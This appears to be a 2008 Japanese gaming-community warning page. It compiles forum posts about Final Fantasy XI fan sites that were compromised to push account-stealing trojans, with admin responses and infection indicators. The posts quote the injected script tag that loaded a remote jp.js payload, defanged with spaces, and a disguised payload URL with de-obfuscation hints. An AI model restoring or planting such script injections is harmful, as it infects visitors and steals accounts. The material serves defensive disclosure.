8/20:FFXI databankは閉鎖されています。

●● RMT業者の垢ハックが多発している件36 ●●より。

以前存在したFFXI databank（ffxi-databank■net）のドメインは、現在業者に占拠されている模様です。（閉鎖後、ドメイン廃棄→業者が再取得→現在は罠サイト化）

なお、GoblinClubの納品報告時に該当ドメインにもデータを飛ばしていた関係で、報告時に危険IPにアクセスしようとしたケースもあった模様です。現在はゴブクラ管理人様により対応されていますが、納品報告を利用したことがある方は念のためチェックをお勧めします。

910 名前：既にその名前は使われています[] 投稿日：2008/08/20(水) 00:17:28 ID:*****
さっきGoblin Clubの納品パターン報告したらPG2が点滅したんで、
開いてみたら、ROwikiで危険ドメインと指定されている
「666■lyzh■com(208■73■210■32)」へのアクセスをブロックしたとの表示が
もしかして、ゴブクラかゴブクラで使ってる広告に何かされたのか？

925 名前：ゴブクラ”管理”者 ◆1Ebj/BJ5c6 [] 投稿日：2008/08/20(水) 01:57:06 ID:*****
>>910
原因がわかりましたので報告。
以前納品提携していたFFXI data bankのURLがらみでした。

サイトがなくなったのに納品データを飛ばしていたことと、
該当のドメイン（ffxi-databank■net）が業者に取られたためのようです。

大丈夫だとは思いますが、心配な方はウィルススキャン等を行ったほうが
いいかと思われます。

すでに該当する部分は外しましたので、今後利用する分には問題ありません。

933 名前：既にその名前は使われています[] 投稿日：2008/08/20(水) 03:29:25 ID:*****
>>925
あれ？・・・ってことはFFXI data bankはもう死んでるの？
たしかにグーグル先生でトップに来たURLをソースチェッカーでみたら４０４で返ってくる。
でも、augseで見るとHPじたいは残ってるっぽい・・・なんじゃこりゃ？

937 名前：既にその名前は使われています[] 投稿日：2008/08/20(水) 03:53:27 ID:*****

＊＊＊前半無関係なので省略＊＊＊

と言ってる間に、ffxi-databank■netを見に行ってる途中で危険サイト指定の
「208●73.210.32」に続いて中国IPの「219●243.201.17」を弾きました

なんだこれ・・・

※注：219●　の方はPlanetLabのものと後で判明

8/15:FFXI Web Portalにも罠（再発）

●● RMT業者の垢ハックが多発している件36 ●●より。
今月に入ってからぐらい？から8/11以前にFFXI Web Portalにアクセスされた方は自環境のチェックを。

なお、踏んだ時にはXREAに仕込まれていたものとは別ものが落ちてくるもようです。
system32\disk.dll
system32\msni.exe
があったらアウトらしい。

※以下のようなやりとりで一度は対応されましたが、8/15現在、再度やられているもようです。

60 名前：既にその名前は使われています[] 投稿日：2008/08/13(水) 23:24:28 ID:I********

>>2に追加。仕込まれてたスクリプトの情報がないけど、同じと思われる。 XREAじゃなくても危ない模様。

Final Fantasy XI Web Portal ( http://ffxiweb■com/ )
　？月？日？時？分頃～8月11日？時？分頃

http://miara.sakura.ne.jp/ff/cgi-bin/talk/index.cgi?mode=resform&res=29373 より引用
> ■ [No.29373] 【注意】“FF11 リンク集”に罠スクリプト / 2008-08-10(日) 23:09:24 [返信|引用] 投稿者 / J
> ←のFF11リンク集でリンクされている、
> “Final Fantasy XI Web Portal”様のサイト（フッターに埋め込まれているので、おそらく全ページがアウトだと思われます）に、
> 危険なドメインに誘導すると思われるスクリプトが埋め込まれています。
> みなさまご注意を。

> ■ [No.29379] Re: / 2008-08-11(月) 02:27:40 [返信|引用] 投稿者 / じゅんたる
> こんばんは。いつもお世話になっています。
> Final Fantasy XI Web Portal管理人のじゅんたるです。
>
> 罠スクリプト確認しました。
> 対策できるまで当サイトを一時停止しました。
> 近日中には復旧できると思います。
> ご迷惑をおかけして申し訳ありませんでした。

107 名前：既にその名前は使われています[] 投稿日：2008/08/14(木) 01:59:13 ID:a*******
>>60
Final Fantasy XI Web Portalさんのところに仕込まれていたスクリプトのアドレスは、これでした。
www●1ive●net■images■banner.jpg
（●を.に、■を/に変換してください)
ソースチェッカーで見ると、スクリプトが吐かれて来ます。


109 名前：既にその名前は使われています[sage] 投稿日：2008/08/14(木) 02:10:41 ID:Y*******b
>>107
XREA改ざんとは別な奴だね。
今いじり中。

110 名前：既にその名前は使われています[sage] 投稿日：2008/08/14(木) 02:18:57 ID:Y*******b
>>107
検体拾えた。
polcoreの文字列が見えるからたぶんFFのアカハック。
system32\disk.dll
system32\msni.exe
これがあったら感染。

111 名前：既にその名前は使われています[sage] 投稿日：2008/08/14(木) 02:43:26 ID:Y*******b
NortonとバスターとBitDefender以外はだいたい検知可能。
ttp://www.virustotal.com/analisis/c0526dddbb0826ce02ea524874b9bb90
ソースネクストですらも(駆除できるかどうかは知らない)。
スカった主なベンダには送付済み。

8/9:XREA上のFF関連サイトが続々改竄

●● RMT業者の垢ハックが多発している件35 ●●より
XREA無料サーバーを利用しているFF関連サイトに続々と改竄が見つかっています。
JavaScript有効かつPG2等でIPフィルタリングを正しく行っていない場合、マルウェアをダウンロードするスクリプトが実行されます。ご注意ください。

389 名前：既にその名前は使われています[] 投稿日：2008/08/09(土) 12:04:00 ID:******
XREA　1039045744:88　の確認されたサイト

吟遊詩人テンプレ：メニュー　ヘッダー　対策済み
FF11・マップガイド（ネット便利）フッターテーブル内　
黒魔協会：xml宣言の前
忍者スレテンプレ：メニュー　との間

403 名前：既にその名前は使われています[sage] 投稿日：2008/08/09(土) 13:26:02 ID:********
うーん…。
>>389 を一通り見てきたけど、これはジョブ戦術板をぱっと見て
テンプレサイトがXREAならはい書き換え～みたいに
XREA上のサイトなら自由に書き換えられる気がするな、この犯人。
広告改竄の時も「こいつ…デキる(ｷﾘｯ」とか思ったけど、まずいよこれ。

# なんかアクセスがいっぱいあると思ったら詩人テンプレからいっぱい来てた(;^ω^)

現在DLされるものの検出状況：カスペ、ノートンは○　バスターは×。

408 名前：既にその名前は使われています[sage] 投稿日：2008/08/09(土) 13:51:34 ID:*******
XREAのあれ、昨夜トロイが更新。
新型はNorton検知・バスター脱落(旧型は逆)。
ttp://www.virustotal.com/analisis/71ffc7eb2711f142889fcf9348212e17
まだ反映されていないけど、AntiVirは「TR/Drop.OnLineGa.35」あるいは
「TR/PSW.OnlineGa.eaa」で撃破予定と返答あり。

※8/11追記
●● RMT業者の垢ハックが多発している件35 ●●より。
このスクリプトで落とされるのは「KernaeghDrv.dll」だそうです。

602 名前：既にその名前は使われています[sage] 投稿日：2008/08/11(月) 03:00:14 ID:*******
>>599
今回XREAに仕掛けられていたのを踏んで投下されるのは
「wzcsvbxm.dll」じゃなくて信長の野望Onlineで話題になっていた(らしい)
「KernaeghDrv.dll」ね。
英Sophosの検出名「Troj/Lineag-DV」の
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojlineagdv.html
の「More Information」参照。

※8/11PM追記
2008年8月XREAサイト改ざん（FF11WARNING）
上記4サイトについては管理者により対応がされた模様。

8/9:FF11マップガイドがやられました

FF11マップガイド（http://netbenri.s137.xrea.com/MAP/MAP.htm）に、先日の吟遊詩人テンプレサイトと同じスクリプトが仕掛けられました。

Firefox3.0.1＋NoScript1.7.8ではアクセスを防いでいましたが、JavaScriptを遮断していない環境ではマルウェアを仕込まれている可能性があります。心当たりの方は確認を。

8/8:詩人スレテンプレサイトがやられました

吟遊詩人スレテンプレサイト（http://bdbk.s41.xrea.com/）が、8月2日23:45頃～7日22:00頃までマルウェアダウンロードスクリプトが仕込まれた状態だった模様です。現在は管理人様の方で対応されていますが、原因が不明のため再発の可能性あり。ご注意ください。

以下詩人スレより。

793 名前：名も無き軍師[sage] 投稿日：08/08/07(木) 22:04:32 ID:********
○詩人スレ住人の方へ 大切なご連絡です○


かなり久しぶりに書き込みます。>>1のテンプレサイト管理人です。

さきほど気付いたのですが、8月2日23時45分頃～今まで、
テンプレサイト内のほぼ全ページに、
謎のスクリプトが、仕込まれてしまっていたようです。

仕込まれていたのは、下記のようなものです。
＜script src= h t t p : // 1039045744 : 88 / jp.js ＞＜/script＞
　　　　　　　↑↑危険かもしれないので、一部スペースを入れ、アクセスできないように書いています。

1039045744で検索すると、どうもアカウントハックを目的とするサイトのようだったので、
慌てて削除をしておきましたが、この期間中にアクセスされた方は、
もしかするとウィルスに感染しているかもしれません。
心当たりのある方は、一度ウィルスチェック等をしていただければと思います。


こんなことが起こるとは思いもよらず、どう対処すればいいのか混乱している状況ですが、
さしあたり、まずは報告をしておくべき、と考え、書き込みさせていただきました。

以上、よろしくお願いします。

794 名前：名も無き軍師[sage] 投稿日：08/08/08(金) 00:10:38 ID:********
>>793続報です。

○被害状況
　　テンプレサイトは、「左側メニュー」・「ヘッダ」・「フッタ」をどのページにも共通に読み込む作りになっているのですが、
　　この共通部品である、「左側メニュー」・「ヘッダ」の2つのファイルにスクリプトが埋め込まれてしまったため、
　　ほぼ全ページにスクリプトを仕込まれた状態になっていました。
　　なお、2つのファイルの更新時刻は、8月2日23時45分、8月2日23時49分でした。

○対応状況
　　どういう経緯でファイルが書き換えられてしまったのか不明なため、
　　さしあたりの対処として、下記3点を行いました。
　　・書き換えられていた2つのファイルの差し戻し
　　・FTPパスワードの変更
　　・TOPページに警告を掲載

　　とりあえずこれで様子をみたいと思いますが、
　　これ以外に何かするべき対策などあれば、お知らせいただけるとありがたいです。
　　よろしくお願いします。

795 名前：名も無き軍師[sage] 投稿日：08/08/08(金) 00:20:43 ID:*******
>>793
アカハクスレにレスへのリンク貼られてたので来てみました
指定ポートが異なりますが、h t t p : // 1039045744:XX～というアドレスは
今年６月にXREAの広告改竄によるアカウントハックが蔓延した際、
接続されていたトロイ置き場と同一です。
おそらくは今回も同様の罠が仕掛けられていたものと想定されます。

また、XREAの無料スペースをご利用されているようですが、
↑でも書いた通り、今年６月にXREAの広告サーバーが乗っ取られ、
一定の確率で「Flashplayerのバージョンが古い場合、閲覧しただけで
アカウントハックトロイが自動的にDL・実行される」という罠が、
6/5～6/17および6/26～6/27の間、無料スペースで表示義務のある
広告に仕込まれていました。
つまり、上記期間中はXREAの無料スペースを使用していたサイトが
全てアカウントハック罠サイトへと変えられていたわけです。
この問題の発生が現在のアカウントハック多発のきっかけともなっており、
貴ＨＰも上記改竄被害を受けたＨＰの条件に当てはまります。
併せて周知いただければと思います。